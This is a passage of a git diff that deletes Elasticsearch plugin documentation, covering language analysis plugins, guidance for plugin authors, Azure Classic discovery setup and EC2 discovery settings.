"强大", - "start_offset": 137, - "end_offset": 139, - "type": "word", - "position": 46 - }, - { - "token": "力量", - "start_offset": 139, - "end_offset": 141, - "type": "word", - "position": 47 - }, - { - "token": "帮助", - "start_offset": 142, - "end_offset": 144, - "type": "word", - "position": 49 - }, - { - "token": "他们", - "start_offset": 144, - "end_offset": 146, - "type": "word", - "position": 50 - }, - { - "token": "以", - "start_offset": 146, - "end_offset": 147, - "type": "word", - "position": 51 - }, - { - "token": "截然不同", - "start_offset": 147, - "end_offset": 151, - "type": "word", - "position": 52 - }, - { - "token": "方式", - "start_offset": 152, - "end_offset": 154, - "type": "word", - "position": 54 - }, - { - "token": "探索", - "start_offset": 154, - "end_offset": 156, - "type": "word", - "position": 55 - }, - { - "token": "和", - "start_offset": 156, - "end_offset": 157, - "type": "word", - "position": 56 - }, - { - "token": "分析", - "start_offset": 157, - "end_offset": 159, - "type": "word", - "position": 57 - }, - { - "token": "数据", - "start_offset": 159, - "end_offset": 161, - "type": "word", - "position": 58 - } - ] -} --------------------------------------------------- diff --git a/docs/plugins/analysis-stempel.asciidoc b/docs/plugins/analysis-stempel.asciidoc deleted file mode 100644 index 54118945ab3..00000000000 --- a/docs/plugins/analysis-stempel.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[[analysis-stempel]] -=== Stempel Polish Analysis Plugin - -The Stempel Analysis plugin integrates Lucene's Stempel analysis -module for Polish into elasticsearch. - -:plugin_name: analysis-stempel -include::install_remove.asciidoc[] - -[[analysis-stempel-tokenizer]] -[discrete] -==== `stempel` tokenizer and token filters - -The plugin provides the `polish` analyzer and the `polish_stem` and `polish_stop` token filters, -which are not configurable. - -==== Reimplementing and extending the analyzers - -The `polish` analyzer could be reimplemented as a `custom` analyzer that can -then be extended and configured differently as follows: - -[source,console] ----------------------------------------------------- -PUT /stempel_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_stempel": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "polish_stop", - "polish_stem" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: stempel_example, first: polish, second: rebuilt_stempel}\nendyaml\n/] - -[[analysis-polish-stop]] -==== `polish_stop` token filter - -The `polish_stop` token filter filters out Polish stopwords (`_polish_`), and -any other custom stopwords specified by the user. This filter only supports -the predefined `_polish_` stopwords list. If you want to use a different -predefined list, then use the -{ref}/analysis-stop-tokenfilter.html[`stop` token filter] instead. - -[source,console] --------------------------------------------------- -PUT /polish_stop_example -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "analyzer_with_stop": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "polish_stop" - ] - } - }, - "filter": { - "polish_stop": { - "type": "polish_stop", - "stopwords": [ - "_polish_", - "jeść" - ] - } - } - } - } - } -} - -GET polish_stop_example/_analyze -{ - "analyzer": "analyzer_with_stop", - "text": "Gdzie kucharek sześć, tam nie ma co jeść." -} --------------------------------------------------- - -The above request returns: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "kucharek", - "start_offset" : 6, - "end_offset" : 14, - "type" : "", - "position" : 1 - }, - { - "token" : "sześć", - "start_offset" : 15, - "end_offset" : 20, - "type" : "", - "position" : 2 - } - ] -} --------------------------------------------------- diff --git a/docs/plugins/analysis-ukrainian.asciidoc b/docs/plugins/analysis-ukrainian.asciidoc deleted file mode 100644 index 534c1708b98..00000000000 --- a/docs/plugins/analysis-ukrainian.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[analysis-ukrainian]] -=== Ukrainian Analysis Plugin - -The Ukrainian Analysis plugin integrates Lucene's UkrainianMorfologikAnalyzer into elasticsearch. - -It provides stemming for Ukrainian using the https://github.com/morfologik/morfologik-stemming[Morfologik project]. - -:plugin_name: analysis-ukrainian -include::install_remove.asciidoc[] - -[[analysis-ukrainian-analyzer]] -[discrete] -==== `ukrainian` analyzer - -The plugin provides the `ukrainian` analyzer. diff --git a/docs/plugins/analysis.asciidoc b/docs/plugins/analysis.asciidoc deleted file mode 100644 index bc347744340..00000000000 --- a/docs/plugins/analysis.asciidoc +++ /dev/null @@ -1,71 +0,0 @@ -[[analysis]] -== Analysis Plugins - -Analysis plugins extend Elasticsearch by adding new analyzers, tokenizers, -token filters, or character filters to Elasticsearch. - -[discrete] -==== Core analysis plugins - -The core analysis plugins are: - -<>:: - -Adds extended Unicode support using the http://site.icu-project.org/[ICU] -libraries, including better analysis of Asian languages, Unicode -normalization, Unicode-aware case folding, collation support, and -transliteration. - -<>:: - -Advanced analysis of Japanese using the https://www.atilika.org/[Kuromoji analyzer]. - -<>:: - -Morphological analysis of Korean using the Lucene Nori analyzer. - -<>:: - -Analyzes tokens into their phonetic equivalent using Soundex, Metaphone, -Caverphone, and other codecs. - -<>:: - -An analyzer for Chinese or mixed Chinese-English text. This analyzer uses -probabilistic knowledge to find the optimal word segmentation for Simplified -Chinese text. The text is first broken into sentences, then each sentence is -segmented into words. - -<>:: - -Provides high quality stemming for Polish. - -<>:: - -Provides stemming for Ukrainian. - -[discrete] -==== Community contributed analysis plugins - -A number of analysis plugins have been contributed by our community: - -* https://github.com/medcl/elasticsearch-analysis-ik[IK Analysis Plugin] (by Medcl) -* https://github.com/medcl/elasticsearch-analysis-pinyin[Pinyin Analysis Plugin] (by Medcl) -* https://github.com/duydo/elasticsearch-analysis-vietnamese[Vietnamese Analysis Plugin] (by Duy Do) -* https://github.com/ofir123/elasticsearch-network-analysis[Network Addresses Analysis Plugin] (by Ofir123) -* https://github.com/ZarHenry96/elasticsearch-dandelion-plugin[Dandelion Analysis Plugin] (by ZarHenry96) -* https://github.com/medcl/elasticsearch-analysis-stconvert[STConvert Analysis Plugin] (by Medcl) - -include::analysis-icu.asciidoc[] - -include::analysis-kuromoji.asciidoc[] - -include::analysis-nori.asciidoc[] - -include::analysis-phonetic.asciidoc[] - -include::analysis-smartcn.asciidoc[] - -include::analysis-stempel.asciidoc[] - -include::analysis-ukrainian.asciidoc[] diff --git a/docs/plugins/api.asciidoc b/docs/plugins/api.asciidoc deleted file mode 100644 index ad12ddbdbf0..00000000000 --- a/docs/plugins/api.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[api]] -== API Extension Plugins - -API extension plugins add new functionality to Elasticsearch by adding new APIs or features, usually to do with search or mapping. - -[discrete] -=== Community contributed API extension plugins - -A number of plugins have been contributed by our community: - -* https://github.com/carrot2/elasticsearch-carrot2[carrot2 Plugin]: - Results clustering with https://github.com/carrot2/carrot2[carrot2] (by Dawid Weiss) - -* https://github.com/wikimedia/search-extra[Elasticsearch Trigram Accelerated Regular Expression Filter]: - (by Wikimedia Foundation/Nik Everett) - -* https://github.com/wikimedia/search-highlighter[Elasticsearch Experimental Highlighter]: - (by Wikimedia Foundation/Nik Everett) - -* https://github.com/YannBrrd/elasticsearch-entity-resolution[Entity Resolution Plugin]: - Uses https://github.com/larsga/Duke[Duke] for duplication detection (by Yann Barraud) - -* https://github.com/zentity-io/zentity[Entity Resolution Plugin] (https://zentity.io[zentity]): - Real-time entity resolution with pure Elasticsearch (by Dave Moore) - -* https://github.com/ritesh-kapoor/elasticsearch-pql[PQL language Plugin]: - Allows Elasticsearch to be queried with simple pipeline query syntax. - -* https://github.com/codelibs/elasticsearch-taste[Elasticsearch Taste Plugin]: - Mahout Taste-based Collaborative Filtering implementation (by CodeLibs Project) - -* https://github.com/jurgc11/es-change-feed-plugin[WebSocket Change Feed Plugin] (by ForgeRock/Chris Clifton) diff --git a/docs/plugins/authors.asciidoc b/docs/plugins/authors.asciidoc deleted file mode 100644 index 76a0588cead..00000000000 --- a/docs/plugins/authors.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[plugin-authors]] -== Help for plugin authors - -:plugin-properties-files: {elasticsearch-root}/buildSrc/src/main/resources - -The Elasticsearch repository contains examples of: - -* a https://github.com/elastic/elasticsearch/tree/master/plugins/examples/custom-settings[Java plugin] - which contains a plugin with custom settings. -* a https://github.com/elastic/elasticsearch/tree/master/plugins/examples/rest-handler[Java plugin] - which contains a plugin that registers a Rest handler. -* a https://github.com/elastic/elasticsearch/tree/master/plugins/examples/rescore[Java plugin] - which contains a rescore plugin. -* a https://github.com/elastic/elasticsearch/tree/master/plugins/examples/script-expert-scoring[Java plugin] - which contains a script plugin. - -These examples provide the bare bones needed to get started. For more -information about how to write a plugin, we recommend looking at the plugins -listed in this documentation for inspiration. - -[discrete] -=== Plugin descriptor file - -All plugins must contain a file called `plugin-descriptor.properties`. -The format for this file is described in detail in this example: - -["source","properties"] --------------------------------------------------- -include::{plugin-properties-files}/plugin-descriptor.properties[] --------------------------------------------------- - -Either fill in this template yourself or, if you are using Elasticsearch's Gradle build system, you -can fill in the necessary values in the `build.gradle` file for your plugin. - -[discrete] -==== Mandatory elements for plugins - - -[cols="<,<,<",options="header",] -|======================================================================= -|Element | Type | Description - -|`description` |String | simple summary of the plugin - -|`version` |String | plugin's version - -|`name` |String | the plugin name - -|`classname` |String | the name of the class to load, fully-qualified. - -|`java.version` |String | version of java the code is built against. -Use the system property `java.specification.version`. Version string must be a sequence -of nonnegative decimal integers separated by "."'s and may have leading zeros. - -|`elasticsearch.version` |String | version of Elasticsearch compiled against. - -|======================================================================= - -Note that only jar files at the root of the plugin are added to the classpath for the plugin! -If you need other resources, package them into a resources jar. - -[IMPORTANT] -.Plugin release lifecycle -============================================== - -You will have to release a new version of the plugin for each new Elasticsearch release. -This version is checked when the plugin is loaded so Elasticsearch will refuse to start -in the presence of plugins with the incorrect `elasticsearch.version`. - -============================================== - - -[discrete] -=== Testing your plugin - -When testing a Java plugin, it will only be auto-loaded if it is in the -`plugins/` directory. Use `bin/elasticsearch-plugin install file:///path/to/your/plugin` -to install your plugin for testing. - -You may also load your plugin within the test framework for integration tests. -Read more in {ref}/integration-tests.html#changing-node-configuration[Changing Node Configuration]. - - -[discrete] -[[plugin-authors-jsm]] -=== Java Security permissions - -Some plugins may need additional security permissions. A plugin can include -the optional `plugin-security.policy` file containing `grant` statements for -additional permissions. Any additional permissions will be displayed to the user -with a large warning, and they will have to confirm them when installing the -plugin interactively. So if possible, it is best to avoid requesting any -spurious permissions! - -If you are using the Elasticsearch Gradle build system, place this file in -`src/main/plugin-metadata` and it will be applied during unit tests as well. - -Keep in mind that the Java security model is stack-based, and the additional -permissions will only be granted to the jars in your plugin, so you will have -write proper security code around operations requiring elevated privileges. -It is recommended to add a check to prevent unprivileged code (such as scripts) -from gaining escalated permissions. For example: - -[source,java] --------------------------------------------------- -// ES permission you should check before doPrivileged() blocks -import org.elasticsearch.SpecialPermission; - -SecurityManager sm = System.getSecurityManager(); -if (sm != null) { - // unprivileged code such as scripts do not have SpecialPermission - sm.checkPermission(new SpecialPermission()); -} -AccessController.doPrivileged( - // sensitive operation -); --------------------------------------------------- - -See https://www.oracle.com/technetwork/java/seccodeguide-139067.html[Secure Coding Guidelines for Java SE] -for more information. diff --git a/docs/plugins/discovery-azure-classic.asciidoc b/docs/plugins/discovery-azure-classic.asciidoc deleted file mode 100644 index b7a94ea60e2..00000000000 --- a/docs/plugins/discovery-azure-classic.asciidoc +++ /dev/null @@ -1,485 +0,0 @@ -[[discovery-azure-classic]] -=== Azure Classic Discovery Plugin - -The Azure Classic Discovery plugin uses the Azure Classic API to identify the -addresses of seed hosts. - -deprecated[5.0.0, This plugin will be removed in the future] - -:plugin_name: discovery-azure-classic -include::install_remove.asciidoc[] - - -[[discovery-azure-classic-usage]] -==== Azure Virtual Machine Discovery - -Azure VM discovery allows to use the Azure APIs to perform automatic discovery. -Here is a simple sample configuration: - -[source,yaml] ----- -cloud: - azure: - management: - subscription.id: XXX-XXX-XXX-XXX - cloud.service.name: es-demo-app - keystore: - path: /path/to/azurekeystore.pkcs12 - password: WHATEVER - type: pkcs12 - -discovery: - seed_providers: azure ----- - -[IMPORTANT] -.Binding the network host -============================================== - -The keystore file must be placed in a directory accessible by Elasticsearch like the `config` directory. - -It's important to define `network.host` as by default it's bound to `localhost`. - -You can use {ref}/modules-network.html[core network host settings]. For example `_en0_`. - -============================================== - -[[discovery-azure-classic-short]] -===== How to start (short story) - -* Create Azure instances -* Install Elasticsearch -* Install Azure plugin -* Modify `elasticsearch.yml` file -* Start Elasticsearch - -[[discovery-azure-classic-settings]] -===== Azure credential API settings - -The following are a list of settings that can further control the credential API: - -[horizontal] -`cloud.azure.management.keystore.path`:: - - /path/to/keystore - -`cloud.azure.management.keystore.type`:: - - `pkcs12`, `jceks` or `jks`. Defaults to `pkcs12`. - -`cloud.azure.management.keystore.password`:: - - your_password for the keystore - -`cloud.azure.management.subscription.id`:: - - your_azure_subscription_id - -`cloud.azure.management.cloud.service.name`:: - - your_azure_cloud_service_name. This is the cloud service name/DNS but without the `cloudapp.net` part. - So if the DNS name is `abc.cloudapp.net` then the `cloud.service.name` to use is just `abc`. - - -[[discovery-azure-classic-settings-advanced]] -===== Advanced settings - -The following are a list of settings that can further control the discovery: - -`discovery.azure.host.type`:: - - Either `public_ip` or `private_ip` (default). Azure discovery will use the - one you set to ping other nodes. - -`discovery.azure.endpoint.name`:: - - When using `public_ip` this setting is used to identify the endpoint name - used to forward requests to Elasticsearch (aka transport port name). - Defaults to `elasticsearch`. In Azure management console, you could define - an endpoint `elasticsearch` forwarding for example requests on public IP - on port 8100 to the virtual machine on port 9300. - -`discovery.azure.deployment.name`:: - - Deployment name if any. Defaults to the value set with - `cloud.azure.management.cloud.service.name`. - -`discovery.azure.deployment.slot`:: - - Either `staging` or `production` (default). - -For example: - -[source,yaml] ----- -discovery: - type: azure - azure: - host: - type: private_ip - endpoint: - name: elasticsearch - deployment: - name: your_azure_cloud_service_name - slot: production ----- - -[[discovery-azure-classic-long]] -==== Setup process for Azure Discovery - -We will expose here one strategy which is to hide our Elasticsearch cluster from outside. - -With this strategy, only VMs behind the same virtual port can talk to each -other. That means that with this mode, you can use Elasticsearch unicast -discovery to build a cluster, using the Azure API to retrieve information -about your nodes. - -[[discovery-azure-classic-long-prerequisites]] -===== Prerequisites - -Before starting, you need to have: - -* A https://azure.microsoft.com/en-us/[Windows Azure account] -* OpenSSL that isn't from MacPorts, specifically `OpenSSL 1.0.1f 6 Jan - 2014` doesn't seem to create a valid keypair for ssh. FWIW, - `OpenSSL 1.0.1c 10 May 2012` on Ubuntu 14.04 LTS is known to work. -* SSH keys and certificate -+ --- - -You should follow http://azure.microsoft.com/en-us/documentation/articles/linux-use-ssh-key/[this guide] to learn -how to create or use existing SSH keys. If you have already did it, you can skip the following. - -Here is a description on how to generate SSH keys using `openssl`: - -[source,sh] ----- -# You may want to use another dir than /tmp -cd /tmp -openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout azure-private.key -out azure-certificate.pem -chmod 600 azure-private.key azure-certificate.pem -openssl x509 -outform der -in azure-certificate.pem -out azure-certificate.cer ----- - -Generate a keystore which will be used by the plugin to authenticate with a certificate -all Azure API calls. - -[source,sh] ----- -# Generate a keystore (azurekeystore.pkcs12) -# Transform private key to PEM format -openssl pkcs8 -topk8 -nocrypt -in azure-private.key -inform PEM -out azure-pk.pem -outform PEM -# Transform certificate to PEM format -openssl x509 -inform der -in azure-certificate.cer -out azure-cert.pem -cat azure-cert.pem azure-pk.pem > azure.pem.txt -# You MUST enter a password! -openssl pkcs12 -export -in azure.pem.txt -out azurekeystore.pkcs12 -name azure -noiter -nomaciter ----- - -Upload the `azure-certificate.cer` file both in the Elasticsearch Cloud Service (under `Manage Certificates`), -and under `Settings -> Manage Certificates`. - -IMPORTANT: When prompted for a password, you need to enter a non empty one. - -See this http://www.windowsazure.com/en-us/manage/linux/how-to-guides/ssh-into-linux/[guide] for -more details about how to create keys for Azure. - -Once done, you need to upload your certificate in Azure: - -* Go to the https://account.windowsazure.com/[management console]. -* Sign in using your account. -* Click on `Portal`. -* Go to Settings (bottom of the left list) -* On the bottom bar, click on `Upload` and upload your `azure-certificate.cer` file. - -You may want to use -http://www.windowsazure.com/en-us/develop/nodejs/how-to-guides/command-line-tools/[Windows Azure Command-Line Tool]: - --- - -* Install https://github.com/joyent/node/wiki/Installing-Node.js-via-package-manager[NodeJS], for example using -homebrew on MacOS X: -+ -[source,sh] ----- -brew install node ----- - -* Install Azure tools -+ -[source,sh] ----- -sudo npm install azure-cli -g ----- - -* Download and import your azure settings: -+ -[source,sh] ----- -# This will open a browser and will download a .publishsettings file -azure account download - -# Import this file (we have downloaded it to /tmp) -# Note, it will create needed files in ~/.azure. You can remove azure.publishsettings when done. -azure account import /tmp/azure.publishsettings ----- - -[[discovery-azure-classic-long-instance]] -===== Creating your first instance - -You need to have a storage account available. Check http://www.windowsazure.com/en-us/develop/net/how-to-guides/blob-storage/#create-account[Azure Blob Storage documentation] -for more information. - -You will need to choose the operating system you want to run on. To get a list of official available images, run: - -[source,sh] ----- -azure vm image list ----- - -Let's say we are going to deploy an Ubuntu image on an extra small instance in West Europe: - -[horizontal] -Azure cluster name:: - - `azure-elasticsearch-cluster` - -Image:: - - `b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu-13_10-amd64-server-20130808-alpha3-en-us-30GB` - -VM Name:: - - `myesnode1` - -VM Size:: - - `extrasmall` - -Location:: - - `West Europe` - -Login:: - - `elasticsearch` - -Password:: - - `password1234!!` - - -Using command line: - -[source,sh] ----- -azure vm create azure-elasticsearch-cluster \ - b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu-13_10-amd64-server-20130808-alpha3-en-us-30GB \ - --vm-name myesnode1 \ - --location "West Europe" \ - --vm-size extrasmall \ - --ssh 22 \ - --ssh-cert /tmp/azure-certificate.pem \ - elasticsearch password1234\!\! ----- - -You should see something like: - -[source,text] ----- -info: Executing command vm create -+ Looking up image -+ Looking up cloud service -+ Creating cloud service -+ Retrieving storage accounts -+ Configuring certificate -+ Creating VM -info: vm create command OK ----- - -Now, your first instance is started. - -[TIP] -.Working with SSH -=============================================== - -You need to give the private key and username each time you log on your instance: - -[source,sh] ----- -ssh -i ~/.ssh/azure-private.key elasticsearch@myescluster.cloudapp.net ----- - -But you can also define it once in `~/.ssh/config` file: - -[source,text] ----- -Host *.cloudapp.net - User elasticsearch - StrictHostKeyChecking no - UserKnownHostsFile=/dev/null - IdentityFile ~/.ssh/azure-private.key ----- -=============================================== - -Next, you need to install Elasticsearch on your new instance. First, copy your -keystore to the instance, then connect to the instance using SSH: - -[source,sh] ----- -scp /tmp/azurekeystore.pkcs12 azure-elasticsearch-cluster.cloudapp.net:/home/elasticsearch -ssh azure-elasticsearch-cluster.cloudapp.net ----- - -Once connected, {stack-gs}/get-started-elastic-stack.html#install-elasticsearch[install {es}]: - -Check that Elasticsearch is running: - -[source,console] ----- -GET / ----- - -This command should give you a JSON result: - -["source","js",subs="attributes,callouts"] --------------------------------------------- -{ - "name" : "Cp8oag6", - "cluster_name" : "elasticsearch", - "cluster_uuid" : "AT69_T_DTp-1qgIJlatQqA", - "version" : { - "number" : "{version_qualified}", - "build_flavor" : "{build_flavor}", - "build_type" : "{build_type}", - "build_hash" : "f27399d", - "build_date" : "2016-03-30T09:51:41.449Z", - "build_snapshot" : false, - "lucene_version" : "{lucene_version}", - "minimum_wire_compatibility_version" : "1.2.3", - "minimum_index_compatibility_version" : "1.2.3" - }, - "tagline" : "You Know, for Search" -} --------------------------------------------- -// TESTRESPONSE[s/"name" : "Cp8oag6",/"name" : "$body.name",/] -// TESTRESPONSE[s/"cluster_name" : "elasticsearch",/"cluster_name" : "$body.cluster_name",/] -// TESTRESPONSE[s/"cluster_uuid" : "AT69_T_DTp-1qgIJlatQqA",/"cluster_uuid" : "$body.cluster_uuid",/] -// TESTRESPONSE[s/"build_hash" : "f27399d",/"build_hash" : "$body.version.build_hash",/] -// TESTRESPONSE[s/"build_date" : "2016-03-30T09:51:41.449Z",/"build_date" : $body.version.build_date,/] -// TESTRESPONSE[s/"build_snapshot" : false,/"build_snapshot" : $body.version.build_snapshot,/] -// TESTRESPONSE[s/"minimum_wire_compatibility_version" : "1.2.3"/"minimum_wire_compatibility_version" : $body.version.minimum_wire_compatibility_version/] -// TESTRESPONSE[s/"minimum_index_compatibility_version" : "1.2.3"/"minimum_index_compatibility_version" : $body.version.minimum_index_compatibility_version/] -// So much s/// but at least we test that the layout is close to matching.... - -[[discovery-azure-classic-long-plugin]] -===== Install Elasticsearch cloud azure plugin - -[source,sh] ----- -# Stop Elasticsearch -sudo service elasticsearch stop - -# Install the plugin -sudo /usr/share/elasticsearch/bin/elasticsearch-plugin install discovery-azure-classic - -# Configure it -sudo vi /etc/elasticsearch/elasticsearch.yml ----- - -And add the following lines: - -[source,yaml] ----- -# If you don't remember your account id, you may get it with `azure account list` -cloud: - azure: - management: - subscription.id: your_azure_subscription_id - cloud.service.name: your_azure_cloud_service_name - keystore: - path: /home/elasticsearch/azurekeystore.pkcs12 - password: your_password_for_keystore - -discovery: - type: azure - -# Recommended (warning: non durable disk) -# path.data: /mnt/resource/elasticsearch/data ----- - -Restart Elasticsearch: - -[source,sh] ----- -sudo service elasticsearch start ----- - -If anything goes wrong, check your logs in `/var/log/elasticsearch`. - -[[discovery-azure-classic-scale]] -==== Scaling Out! - -You need first to create an image of your previous machine. -Disconnect from your machine and run locally the following commands: - -[source,sh] ----- -# Shutdown the instance -azure vm shutdown myesnode1 - -# Create an image from this instance (it could take some minutes) -azure vm capture myesnode1 esnode-image --delete - -# Note that the previous instance has been deleted (mandatory) -# So you need to create it again and BTW create other instances. - -azure vm create azure-elasticsearch-cluster \ - esnode-image \ - --vm-name myesnode1 \ - --location "West Europe" \ - --vm-size extrasmall \ - --ssh 22 \ - --ssh-cert /tmp/azure-certificate.pem \ - elasticsearch password1234\!\! ----- - - -[TIP] -========================================= -It could happen that azure changes the endpoint public IP address. -DNS propagation could take some minutes before you can connect again using -name. You can get from azure the IP address if needed, using: - -[source,sh] ----- -# Look at Network `Endpoints 0 Vip` -azure vm show myesnode1 ----- - -========================================= - -Let's start more instances! - -[source,sh] ----- -for x in $(seq 2 10) - do - echo "Launching azure instance #$x..." - azure vm create azure-elasticsearch-cluster \ - esnode-image \ - --vm-name myesnode$x \ - --vm-size extrasmall \ - --ssh $((21 + $x)) \ - --ssh-cert /tmp/azure-certificate.pem \ - --connect \ - elasticsearch password1234\!\! - done ----- - -If you want to remove your running instances: - -[source,sh] ----- -azure vm delete myesnode1 ----- diff --git a/docs/plugins/discovery-ec2.asciidoc b/docs/plugins/discovery-ec2.asciidoc deleted file mode 100644 index f5c6c76402a..00000000000 --- a/docs/plugins/discovery-ec2.asciidoc +++ /dev/null @@ -1,368 +0,0 @@ -[[discovery-ec2]] -=== EC2 Discovery Plugin - -The EC2 discovery plugin provides a list of seed addresses to the -{ref}/modules-discovery-hosts-providers.html[discovery process] by querying the -https://github.com/aws/aws-sdk-java[AWS API] for a list of EC2 instances -matching certain criteria determined by the <>. - -*If you are looking for a hosted solution of {es} on AWS, please visit -https://www.elastic.co/cloud.* - -:plugin_name: discovery-ec2 -include::install_remove.asciidoc[] - -[[discovery-ec2-usage]] -==== Using the EC2 discovery plugin - -The `discovery-ec2` plugin allows {es} to find the master-eligible nodes in a -cluster running on AWS EC2 by querying the -https://github.com/aws/aws-sdk-java[AWS API] for the addresses of the EC2 -instances running these nodes. - -It is normally a good idea to restrict the discovery process just to the -master-eligible nodes in the cluster. This plugin allows you to identify these -nodes by certain criteria including their tags, their membership of security -groups, and their placement within availability zones. The discovery process -will work correctly even if it finds master-ineligible nodes, but master -elections will be more efficient if this can be avoided. - -The interaction with the AWS API can be authenticated using the -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html[instance -role], or else custom credentials can be supplied. - -===== Enabling EC2 discovery - -To enable EC2 discovery, configure {es} to use the `ec2` seed hosts provider: - -[source,yaml] ----- -discovery.seed_providers: ec2 ----- - -===== Configuring EC2 discovery - -EC2 discovery supports a number of settings. Some settings are sensitive and -must be stored in the {ref}/secure-settings.html[{es} keystore]. For example, -to authenticate using a particular access key and secret key, add these keys to -the keystore by running the following commands: - -[source,sh] ----- -bin/elasticsearch-keystore add discovery.ec2.access_key -bin/elasticsearch-keystore add discovery.ec2.secret_key ----- - -The available settings for the EC2 discovery plugin are as follows. - -`discovery.ec2.access_key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An EC2 access key. If set, you must also set `discovery.ec2.secret_key`. - If unset, `discovery-ec2` will instead use the instance role. This setting - is sensitive and must be stored in the {es} keystore. - -`discovery.ec2.secret_key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An EC2 secret key. If set, you must also set `discovery.ec2.access_key`. - This setting is sensitive and must be stored in the {es} keystore. - -`discovery.ec2.session_token` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An EC2 session token. If set, you must also set `discovery.ec2.access_key` - and `discovery.ec2.secret_key`. This setting is sensitive and must be - stored in the {es} keystore. - -`discovery.ec2.endpoint`:: - - The EC2 service endpoint to which to connect. See - https://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region to find - the appropriate endpoint for the region. This setting defaults to - `ec2.us-east-1.amazonaws.com` which is appropriate for clusters running in - the `us-east-1` region. - -`discovery.ec2.protocol`:: - - The protocol to use to connect to the EC2 service endpoint, which may be - either `http` or `https`. Defaults to `https`. - -`discovery.ec2.proxy.host`:: - - The address or host name of an HTTP proxy through which to connect to EC2. - If not set, no proxy is used. - -`discovery.ec2.proxy.port`:: - - When the address of an HTTP proxy is given in `discovery.ec2.proxy.host`, - this setting determines the port to use to connect to the proxy. Defaults to - `80`. - -`discovery.ec2.proxy.username` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - When the address of an HTTP proxy is given in `discovery.ec2.proxy.host`, - this setting determines the username to use to connect to the proxy. When - not set, no username is used. This setting is sensitive and must be stored - in the {es} keystore. - -`discovery.ec2.proxy.password` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - When the address of an HTTP proxy is given in `discovery.ec2.proxy.host`, - this setting determines the password to use to connect to the proxy. When - not set, no password is used. This setting is sensitive and must be stored - in the {es} keystore. - -`discovery.ec2.read_timeout`:: - - The socket timeout for connections to EC2, - {ref}/common-options.html#time-units[including the units]. For example, a - value of `60s` specifies a 60-second timeout. Defaults to 50 seconds. - -`discovery.ec2.groups`:: - - A list of the names or IDs of the security groups to use for discovery. The - `discovery.ec2.any_group` setting determines the behaviour of this setting. - Defaults to an empty list, meaning that security group membership is - ignored by EC2 discovery. - -`discovery.ec2.any_group`:: - - Defaults to `true`, meaning that instances belonging to _any_ of the - security groups specified in `discovery.ec2.groups` will be used for - discovery. If set to `false`, only instances that belong to _all_ of the - security groups specified in `discovery.ec2.groups` will be used for - discovery. - -`discovery.ec2.host_type`:: - -+ --- - -Each EC2 instance has a number of different addresses that might be suitable -for discovery. This setting allows you to select which of these addresses is -used by the discovery process. It can be set to one of `private_ip`, -`public_ip`, `private_dns`, `public_dns` or `tag:TAGNAME` where `TAGNAME` -refers to a name of a tag. This setting defaults to `private_ip`. - -If you set `discovery.ec2.host_type` to a value of the form `tag:TAGNAME` then -the value of the tag `TAGNAME` attached to each instance will be used as that -instance's address for discovery. Instances which do not have this tag set will -be ignored by the discovery process. - -For example if you tag some EC2 instances with a tag named -`elasticsearch-host-name` and set `host_type: tag:elasticsearch-host-name` then -the `discovery-ec2` plugin will read each instance's host name from the value -of the `elasticsearch-host-name` tag. -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Using_Tags.html[Read more -about EC2 Tags]. - --- - -`discovery.ec2.availability_zones`:: - - A list of the names of the availability zones to use for discovery. The - name of an availability zone is the - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html[region - code followed by a letter], such as `us-east-1a`. Only instances placed in - one of the given availability zones will be used for discovery. - -[[discovery-ec2-filtering]] -`discovery.ec2.tag.TAGNAME`:: - -+ --- - -A list of the values of a tag called `TAGNAME` to use for discovery. If set, -only instances that are tagged with one of the given values will be used for -discovery. For instance, the following settings will only use nodes with a -`role` tag set to `master` and an `environment` tag set to either `dev` or -`staging`. - -[source,yaml] ----- -discovery.ec2.tag.role: master -discovery.ec2.tag.environment: dev,staging ----- - -NOTE: The names of tags used for discovery may only contain ASCII letters, -numbers, hyphens and underscores. In particular you cannot use tags whose name -includes a colon. - --- - -`discovery.ec2.node_cache_time`:: - - Sets the length of time for which the collection of discovered instances is - cached. {es} waits at least this long between requests for discovery - information from the EC2 API. AWS may reject discovery requests if they are - made too often, and this would cause discovery to fail. Defaults to `10s`. - -All **secure** settings of this plugin are -{ref}/secure-settings.html#reloadable-secure-settings[reloadable], allowing you -to update the secure settings for this plugin without needing to restart each -node. - - -[[discovery-ec2-permissions]] -===== Recommended EC2 permissions - -The `discovery-ec2` plugin works by making a `DescribeInstances` call to the AWS -EC2 API. You must configure your AWS account to allow this, which is normally -done using an IAM policy. You can create a custom policy via the IAM Management -Console. It should look similar to this. - -[source,js] ----- -{ - "Statement": [ - { - "Action": [ - "ec2:DescribeInstances" - ], - "Effect": "Allow", - "Resource": [ - "*" - ] - } - ], - "Version": "2012-10-17" -} ----- -// NOTCONSOLE - -[[discovery-ec2-attributes]] -===== Automatic node attributes - -The `discovery-ec2` plugin can automatically set the `aws_availability_zone` -node attribute to the availability zone of each node. This node attribute -allows you to ensure that each shard has copies allocated redundantly across -multiple availability zones by using the -{ref}/modules-cluster.html#shard-allocation-awareness[Allocation Awareness] -feature. - -In order to enable the automatic definition of the `aws_availability_zone` -attribute, set 